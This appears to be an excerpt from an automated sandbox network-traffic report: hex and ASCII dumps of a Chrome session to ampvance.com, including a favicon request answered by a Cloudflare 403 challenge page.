                                                      2024-03-05 13:23:17 UTC723INData Raw: 33 34 62 38 0d 0a 69 56 75 50 68 6c 74 2f 6b 57 78 7a 54 59 32 4a 64 6e 5a 6d 65 49 65 61 6a 48 70 71 6b 70 47 4e 67 36 61 56 6b 59 69 48 68 6d 61 55 65 61 47 45 65 34 53 6b 62 35 4f 6f 73 4b 71 45 6b 35 61 54 66 49 56 38 72 4b 47 68 6b 70 4f 55 78 61 4f 6c 6f 38 72 45 69 61 4b 4a 6a 62 6d 62 78 38 58 50 76 61 72 54 73 39 50 44 73 62 57 62 6c 37 79 37 72 72 69 35 32 72 65 77 6f 65 4c 44 78 62 75 35 77 39 2f 63 36 38 50 64 38 2b 4c 53 30 4c 47 7a 74 65 65 77 74 4c 4b 38 30 38 7a 4f 36 66 4c 4f 39 4e 6a 51 41 72 2f 63 43 4c 33 35 32 50 6f 48 45 67 33 36 42 67 6e 39 39 50 49 4e 31 76 41 45 45 50 4c 36 47 52 33 32 2b 51 51 4f 39 4f 2f 6c 48 77 66 37 35 39 37 6d 41 65 45 77 36 65 30 4f 49 77 45 66 41 79 67 37 46 67 62 34 4b 66 41 53 4d 2f 30 56 47 54 63 58 48
                                                      Data Ascii: 34b8iVuPhlt/kWxzTY2JdnZmeIeajHpqkpGNg6aVkYiHhmaUeaGEe4Skb5OosKqEk5aTfIV8rKGhkpOUxaOlo8rEiaKJjbmbx8XPvarTs9PDsbWbl7y7rri52rewoeLDxbu5w9/c68Pd8+LS0LGzteewtLK808zO6fLO9NjQAr/cCL352PoHEg36Bgn99PIN1vAEEPL6GR32+QQO9O/lHwf7597mAeEw6e0OIwEfAyg7Fgb4KfASM/0VGTcXH
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 61 65 68 6c 71 53 42 64 61 31 39 70 6e 2b 7a 71 35 53 4a 6a 49 36 72 75 62 69 77 68 49 32 5a 69 61 79 58 65 72 75 75 6f 63 53 56 68 6f 62 4b 77 72 36 6c 6d 35 32 76 72 37 48 42 31 4c 2f 57 70 71 79 6a 70 73 2b 38 73 5a 66 53 79 4c 44 44 77 74 4b 31 74 75 66 4a 78 63 43 69 77 62 66 4e 7a 50 44 53 77 62 79 78 78 74 2f 72 38 65 57 79 35 76 48 6c 79 2f 7a 41 76 4e 36 2b 37 73 41 46 42 4f 66 31 41 41 4d 4a 2b 41 50 67 33 75 4d 48 34 77 6b 4d 30 68 63 52 42 42 44 6a 45 68 72 63 36 67 4c 73 2b 79 55 42 34 66 77 6c 42 52 55 66 2b 67 4c 6c 4a 2b 33 74 37 69 77 49 4a 67 55 42 4f 42 6f 73 45 44 49 4b 4b 52 30 64 50 42 55 53 45 68 63 46 47 76 35 49 48 6b 67 58 43 52 5a 42 54 78 45 66 48 6a 78 46 49 55 59 59 4d 45 51 55 4d 55 64 48 48 46 55 68 56 6b 30 75 5a 6a 4d 69
                                                      Data Ascii: aehlqSBda19pn+zq5SJjI6rubiwhI2ZiayXeruuocSVhobKwr6lm52vr7HB1L/Wpqyjps+8sZfSyLDDwtK1tufJxcCiwbfNzPDSwbyxxt/r8eWy5vHly/zAvN6+7sAFBOf1AAMJ+APg3uMH4wkM0hcRBBDjEhrc6gLs+yUB4fwlBRUf+gLlJ+3t7iwIJgUBOBosEDIKKR0dPBUSEhcFGv5IHkgXCRZBTxEfHjxFIUYYMEQUMUdHHFUhVk0uZjMi
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 36 71 67 4c 42 36 73 49 61 50 63 61 61 4a 63 62 69 73 6a 35 75 5a 6e 62 56 39 64 4b 79 76 73 5a 71 31 77 73 57 33 77 63 61 6d 71 38 36 6d 71 6f 71 50 6a 36 36 7a 31 70 47 79 6b 70 65 62 74 72 76 65 32 4c 71 61 6e 39 61 2b 77 2b 62 6f 77 71 4b 6f 7a 4d 62 4c 37 38 2f 4a 33 71 6d 77 33 73 33 71 39 4f 76 78 30 75 71 7a 32 63 6e 68 76 4c 7a 61 42 63 2f 5a 42 38 66 67 2b 41 50 4d 35 76 34 4e 35 4e 6e 45 45 75 6f 50 33 39 58 55 34 2f 76 35 44 74 7a 55 44 66 62 68 38 52 76 77 35 52 30 6c 36 43 63 63 2f 41 77 4b 36 68 73 69 48 2b 76 6c 45 2b 76 79 44 54 6f 74 39 66 73 6c 39 54 6f 54 2f 76 67 78 47 68 51 66 47 54 34 56 48 78 34 66 48 79 4d 73 49 68 6b 2b 54 46 49 4d 4b 30 30 6e 56 41 78 56 4c 67 38 58 58 52 38 33 59 47 45 66 51 44 38 65 56 6a 4a 71 51 6a 77 32 5a
                                                      Data Ascii: 6qgLB6sIaPcaaJcbisj5uZnbV9dKyvsZq1wsW3wcamq86mqoqPj66z1pGykpebtrve2Lqan9a+w+bowqKozMbL78/J3qmw3s3q9Ovx0uqz2cnhvLzaBc/ZB8fg+APM5v4N5NnEEuoP39XU4/v5DtzUDfbh8Rvw5R0l6Ccc/AwK6hsiH+vlE+vyDTot9fsl9ToT/vgxGhQfGT4VHx4fHyMsIhk+TFIMK00nVAxVLg8XXR83YGEfQD8eVjJqQjw2Z
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 75 64 4a 53 6a 6a 6f 6c 36 66 48 75 6e 64 35 71 4b 67 5a 79 6b 6f 4a 36 69 68 38 4f 67 7a 49 69 64 76 36 47 4f 6a 61 43 50 30 61 76 4b 6a 39 69 79 74 73 32 37 76 73 37 54 30 4d 36 55 75 75 47 58 75 72 72 49 74 63 6e 49 76 4d 6e 62 75 4b 6a 46 37 63 44 65 35 39 2f 41 77 74 6a 47 75 4e 4c 75 76 65 41 41 76 4e 7a 77 7a 73 44 42 37 2f 76 69 35 73 58 45 44 75 6b 49 34 38 6e 4f 44 4f 48 4c 39 41 62 33 7a 78 4c 31 48 67 38 64 45 76 66 63 45 77 41 64 46 4f 51 41 2b 50 67 46 46 53 73 58 48 41 44 6d 41 7a 49 64 37 76 30 70 37 2f 4c 35 45 52 6f 70 43 41 35 41 4c 50 34 67 47 6a 38 58 4e 7a 51 55 45 78 4e 45 53 53 49 38 55 43 63 61 4a 30 68 4b 4c 42 4a 44 54 69 38 55 56 31 52 58 54 47 42 4d 4e 44 45 69 56 7a 51 64 49 6c 45 30 4f 6a 74 4b 59 69 35 49 54 53 35 4f 4b 6c
                                                      Data Ascii: udJSjjol6fHund5qKgZykoJ6ih8OgzIidv6GOjaCP0avKj9iyts27vs7T0M6UuuGXurrItcnIvMnbuKjF7cDe59/AwtjGuNLuveAAvNzwzsDB7/vi5sXEDukI48nODOHL9Ab3zxL1Hg8dEvfcEwAdFOQA+PgFFSsXHADmAzId7v0p7/L5ERopCA5ALP4gGj8XNzQUExNESSI8UCcaJ0hKLBJDTi8UV1RXTGBMNDEiVzQdIlE0OjtKYi5ITS5OKl
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 6a 70 36 78 74 34 71 59 74 58 79 4e 77 35 4b 64 78 35 6d 34 75 72 79 61 70 6f 47 6f 78 64 50 52 30 34 65 57 70 36 47 7a 77 35 72 54 78 62 57 37 73 35 71 72 30 4c 2b 67 72 70 33 41 78 61 65 68 78 2b 65 75 78 65 4b 38 79 2b 37 66 79 4d 72 42 72 38 4f 77 36 4e 65 30 76 64 41 42 73 39 7a 4d 41 76 6e 67 42 50 6b 43 77 67 7a 34 35 2f 6e 74 44 63 34 51 35 52 49 41 46 64 55 61 35 52 6a 76 36 68 66 59 43 52 49 59 48 39 7a 69 32 78 58 6b 47 51 6e 6a 4a 79 49 63 35 67 58 6d 47 75 6f 66 43 41 63 44 49 7a 59 6f 50 43 66 36 4b 6a 38 73 44 43 77 4d 41 42 64 48 47 78 45 64 45 6b 45 70 46 79 34 50 50 55 63 64 4a 42 52 44 48 30 73 70 56 6a 73 34 47 56 6b 74 4b 45 68 4f 50 31 55 61 50 6a 45 65 51 7a 55 7a 4a 57 31 6d 61 79 31 51 61 6c 31 6e 4b 69 64 47 51 30 70 44 61 45 56
                                                      Data Ascii: jp6xt4qYtXyNw5Kdx5m4uryapoGoxdPR04eWp6Gzw5rTxbW7s5qr0L+grp3Axaehx+euxeK8y+7fyMrBr8Ow6Ne0vdABs9zMAvngBPkCwgz45/ntDc4Q5RIAFdUa5Rjv6hfYCRIYH9zi2xXkGQnjJyIc5gXmGuofCAcDIzYoPCf6Kj8sDCwMABdHGxEdEkEpFy4PPUcdJBRDH0spVjs4GVktKEhOP1UaPjEeQzUzJW1may1Qal1nKidGQ0pDaEV
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 4c 57 37 74 72 53 32 76 4b 43 7a 6d 59 4b 59 68 73 66 45 30 64 47 73 72 62 47 66 72 74 69 78 6d 4a 6a 5a 32 35 43 37 73 70 69 61 6f 37 37 54 30 73 69 6c 75 74 2f 62 6f 74 6a 4b 71 73 4f 38 33 4d 6d 2f 30 71 6a 4a 38 72 6e 59 37 72 66 57 78 75 37 55 36 67 48 33 77 76 48 43 2b 4e 6a 69 77 75 54 63 41 77 4c 5a 34 4e 37 61 33 63 2f 50 36 73 2f 58 47 4f 77 4d 48 50 44 79 36 68 73 67 47 50 34 64 4a 66 66 37 2b 51 73 73 36 43 30 72 48 78 41 68 48 43 6f 31 42 68 49 71 44 42 50 34 46 77 62 38 4e 78 4d 56 4f 53 41 53 46 6a 63 5a 4f 30 59 48 51 51 6f 39 4e 77 6b 6a 4b 77 68 53 4b 46 56 54 44 44 45 70 4a 53 73 79 54 6a 63 38 54 31 39 62 4b 68 56 57 55 32 55 36 4d 7a 6c 70 52 54 68 47 57 47 68 41 4c 45 39 46 4b 31 56 54 59 45 68 6d 52 7a 5a 39 4d 33 38 36 58 46 69 42
                                                      Data Ascii: LW7trS2vKCzmYKYhsfE0dGsrbGfrtixmJjZ25C7spiao77T0silut/botjKqsO83Mm/0qjJ8rnY7rfWxu7U6gH3wvHC+NjiwuTcAwLZ4N7a3c/P6s/XGOwMHPDy6hsgGP4dJff7+Qss6C0rHxAhHCo1BhIqDBP4Fwb8NxMVOSASFjcZO0YHQQo9NwkjKwhSKFVTDDEpJSsyTjc8T19bKhVWU2U6MzlpRThGWGhALE9FK1VTYEhmRzZ9M386XFiB
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 2f 41 68 4d 79 2b 70 6f 6d 37 7a 63 6e 4a 73 73 57 2b 6b 62 47 6b 30 63 33 4c 32 4d 7a 58 76 72 6e 56 32 39 54 56 32 4e 36 39 74 2b 48 4d 79 72 72 64 35 38 72 4e 36 65 76 4b 35 64 2f 73 30 75 58 71 75 4d 62 74 35 76 58 34 33 4f 76 54 30 51 66 34 2f 73 51 46 41 41 50 57 41 67 54 4b 42 65 6e 36 37 77 48 6f 43 76 66 78 35 51 73 4f 2b 64 51 56 38 4f 41 64 45 2f 48 68 2b 42 33 32 41 78 67 62 46 41 49 6f 4a 4f 77 63 41 52 77 47 41 75 38 74 47 42 49 49 4d 6a 44 31 47 42 6a 35 48 78 30 31 4e 69 4d 5a 4f 66 34 65 47 55 46 45 47 7a 6f 38 43 30 56 43 50 53 51 7a 52 6b 30 70 51 53 6c 51 55 7a 5a 63 56 52 74 64 4f 30 30 31 50 31 5a 50 58 54 59 33 59 46 35 4f 61 46 63 73 49 32 4a 6f 4b 32 56 6a 62 56 52 6f 53 48 42 77 4e 58 78 77 61 46 39 77 64 48 78 74 63 33 31 77 61
                                                      Data Ascii: /AhMy+pom7zcnJssW+kbGk0c3L2MzXvrnV29TV2N69t+HMyrrd58rN6evK5d/s0uXquMbt5vX43OvT0Qf4/sQFAAPWAgTKBen67wHoCvfx5QsO+dQV8OAdE/Hh+B32AxgbFAIoJOwcARwGAu8tGBIIMjD1GBj5Hx01NiMZOf4eGUFEGzo8C0VCPSQzRk0pQSlQUzZcVRtdO001P1ZPXTY3YF5OaFcsI2JoK2VjbVRoSHBwNXxwaF9wdHxtc31wa
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 69 75 38 47 4e 68 70 2f 47 70 71 61 7a 7a 5a 66 51 6d 4d 61 56 6c 38 6d 76 32 5a 79 2b 78 4c 4f 6c 77 4d 62 49 79 63 44 66 7a 4c 33 46 7a 71 75 39 7a 64 4f 75 74 4e 62 58 74 72 7a 76 32 73 7a 56 39 39 2f 31 76 50 58 68 77 72 2f 34 30 2b 6b 4e 35 50 6b 4a 33 73 6b 53 44 2b 50 71 34 68 4c 79 30 68 6f 62 44 64 7a 70 43 4e 76 32 49 76 55 6d 47 50 49 54 41 50 6b 70 46 75 72 35 35 68 38 45 2f 53 30 6a 44 2b 38 32 43 2b 6f 37 4e 2f 6e 79 4b 77 30 37 51 69 7a 2b 50 2f 73 6a 46 55 45 47 4b 6a 30 6c 42 77 73 67 51 30 6b 67 51 6b 63 32 4d 55 51 6d 4f 56 6f 7a 55 69 30 5a 50 53 6f 61 4d 6a 39 57 4e 79 39 43 49 30 49 38 53 47 4a 4b 5a 45 74 6a 4f 57 31 46 56 45 49 2b 54 44 46 4e 65 31 51 7a 56 6d 64 66 57 6b 46 5a 56 30 39 68 51 48 56 6d 57 59 52 54 62 55 52 69 54 56
                                                      Data Ascii: iu8GNhp/GpqazzZfQmMaVl8mv2Zy+xLOlwMbIycDfzL3Fzqu9zdOutNbXtrzv2szV99/1vPXhwr/40+kN5PkJ3skSD+Pq4hLy0hobDdzpCNv2IvUmGPITAPkpFur55h8E/S0jD+82C+o7N/nyKw07Qiz+P/sjFUEGKj0lBwsgQ0kgQkc2MUQmOVozUi0ZPSoaMj9WNy9CI0I8SGJKZEtjOW1FVEI+TDFNe1QzVmdfWkFZV09hQHVmWYRTbURiTV
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 6a 64 6d 30 31 62 47 34 32 4d 7a 50 32 5a 66 67 6d 65 43 6b 34 61 2b 68 77 74 58 67 78 75 62 75 32 38 2f 6a 36 71 6d 39 38 4f 2f 54 77 65 4c 5a 30 63 6a 73 7a 4f 72 67 37 63 7a 32 41 76 6f 47 32 2f 50 44 2b 2b 76 4a 2b 65 54 75 43 4e 6e 38 79 75 2f 74 45 4f 6a 32 42 66 44 37 39 39 6e 72 48 77 73 43 2b 69 55 6d 38 42 77 41 42 78 6a 70 2f 65 77 59 44 68 45 47 42 67 45 4e 46 53 63 78 43 53 77 32 47 2f 73 49 2f 52 63 50 51 6a 52 45 47 6a 6b 69 47 42 41 7a 46 68 38 59 53 44 6b 75 47 30 30 2f 4c 79 74 44 49 56 41 32 47 56 56 49 4b 78 6f 71 53 6c 4a 4e 49 42 34 36 4c 57 51 6d 56 6c 4e 65 57 6d 68 68 53 6b 41 34 57 7a 39 49 55 30 30 2b 53 55 6c 57 65 6d 5a 6c 63 6d 71 41 56 44 70 2b 54 58 56 45 63 31 46 67 61 57 6d 49 67 6d 6d 48 52 59 52 4f 59 34 4f 44 55 57 31
                                                      Data Ascii: jdm01bG42MzP2ZfgmeCk4a+hwtXgxubu28/j6qm98O/TweLZ0cjszOrg7cz2AvoG2/PD++vJ+eTuCNn8yu/tEOj2BfD799nrHwsC+iUm8BwABxjp/ewYDhEGBgENFScxCSw2G/sI/RcPQjREGjkiGBAzFh8YSDkuG00/LytDIVA2GVVIKxoqSlJNIB46LWQmVlNeWmhhSkA4Wz9IU00+SUlWemZlcmqAVDp+TXVEc1FgaWmIgmmHRYROY4ODUW1


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.449745104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:17 UTC852OUTGET /favicon.ico HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ampvance.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:23:17 UTC1290INHTTP/1.1 403 Forbidden
                                                      Date: Tue, 05 Mar 2024 13:23:17 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 16226
                                                      Connection: close
                                                      Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                      Cross-Origin-Embedder-Policy: require-corp
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Cross-Origin-Resource-Policy: same-origin
                                                      Origin-Agent-Cluster: ?1
                                                      Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                      Referrer-Policy: same-origin
                                                      X-Frame-Options: SAMEORIGIN
                                                      cf-mitigated: challenge
                                                      cf-chl-out: /orLynNxT+AvVJSe8SqspTD77BJQ0iddxfOb02BXud27TapXpkkbrq6JeOTvyOKauSj2ND8z32+P/oJ96JU2R4A+8TfYA4sH3lLI/zqrHmfTMIuK/H3+WQcegnOJEA+zDiID3RtomCWL+xyQ5C5INA==$rgF9YV4Q0b47gy/C9DKn4w==
                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      2024-03-05 13:23:17 UTC403INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 47 61 74 59 57 49 35 32 63 42 56 73 74 36 6c 41 25 32 46 56 55 55 47 33 48 31 6e 38 57 6c 56 75 49 43 4a 58 30 32 31 51 6c 4e 6b 32 25 32 42 54 72 52 32 34 72 30 57 41 32 71 34 64 56 79 57 73 42 61 37 69 58 73 45 25 32 46 32 46 63 56 34 64 6c 52 67 42 72 62 4e 4e 59 44 45 50 62 32 63 78 41 7a 57 61 30 37 79 53 55 32 54 36 31 51 68 4c 7a 73 45 43 56 4c 42 71 35 54 66 72 70 52 68 35 50 6a 75 62 67 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e
                                                      Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GatYWI52cBVst6lA%2FVUUG3H1n8WlVuICJX021QlNk2%2BTrR24r0WA2q4dVyWsBa7iXsE%2F2FcV4dlRgBrbNNYDEPb2cxAzWa07ySU2T61QhLzsECVLBq5TfrpRh5Pjubg%3D"}],"group":"cf-nel","max_age":604800}N
                                                      2024-03-05 13:23:17 UTC1045INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                      Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54
                                                      Data Ascii: zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMT
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 62 6f 64 79 2e 64 61 72 6b 20 2e 62 69 67 2d 62 75 74 74 6f 6e 2c 62 6f 64 79 2e 64 61 72 6b 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30
                                                      Data Ascii: body.dark .big-button,body.dark .pow-button{background-color:#4693ff;color:#1d1d1d}body.dark #challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 35 39 35 39 35 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 66 63 35 37 34 61 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 62 69 67 2d 62 75 74 74 6f 6e 2c 62 6f 64 79 2e 6c 69 67 68 74 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 6c 69 67 68 74 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67
                                                      Data Ascii: ng div{border-color:#595959 transparent transparent}body.light .font-red{color:#fc574a}body.light .big-button,body.light .pow-button{background-color:#003681;border-color:#003681;color:#fff}body.light #challenge-success-text{background-image:url(data:imag
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 20 65 61 73 65 7d 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 68 65 69 67 68 74 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74
                                                      Data Ascii: -decoration:none;transition:color .15s ease}a:hover{color:#ee730a;text-decoration:underline}.main-content{margin:8rem auto;max-width:60rem;width:100%}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media (width <= 720px){.main-content{margin-t
                                                      2024-03-05 13:23:17 UTC1369INData Raw: 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b
                                                      Data Ascii: tLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{back
